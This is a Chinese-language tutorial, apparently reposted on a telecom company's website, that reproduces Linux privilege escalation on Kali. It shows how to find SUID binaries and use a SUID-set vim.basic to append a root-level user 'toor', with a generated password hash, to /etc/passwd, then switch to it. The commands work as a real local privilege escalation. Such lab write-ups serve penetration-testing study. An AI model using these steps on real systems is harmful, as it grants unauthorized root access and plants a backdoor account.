• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    Linux使用suid vim.basic文件实现提权

    在kali上复现

    先给需要的vim.basic文件设置suid权限

    chmod u+s /usr/bin/vim.basic

    先adduser test1一个普通权限用户

    现在就是一个合适的提权环境

    通过以下命令可以找到存在suid权限的文件

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;

    可用于提权的文件有

    利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

    passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

    这边可以看看root用户的格式

    root:x:0:0:root:/root:/bin/bash

    (密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

    生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

    直接写在passwd文件里面,

    toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

    用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

    这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

    vim.basic /etc/passwd

    用这个打开,然后修改文件,就可以成功保存

    可以看到已经添加了,su toor切换,密码123,再id查看一下权限

    root权限

    chmod u+s /usr/bin/vim.basic

    以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。

    上一篇:解决VMware 虚拟机开机黑屏的问题
    下一篇:在阿里云购买云服务器并安装宝塔面板的步骤
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    Linux使用suid vim.basic文件实现提权 Linux,使用,suid,vim.basic,文件,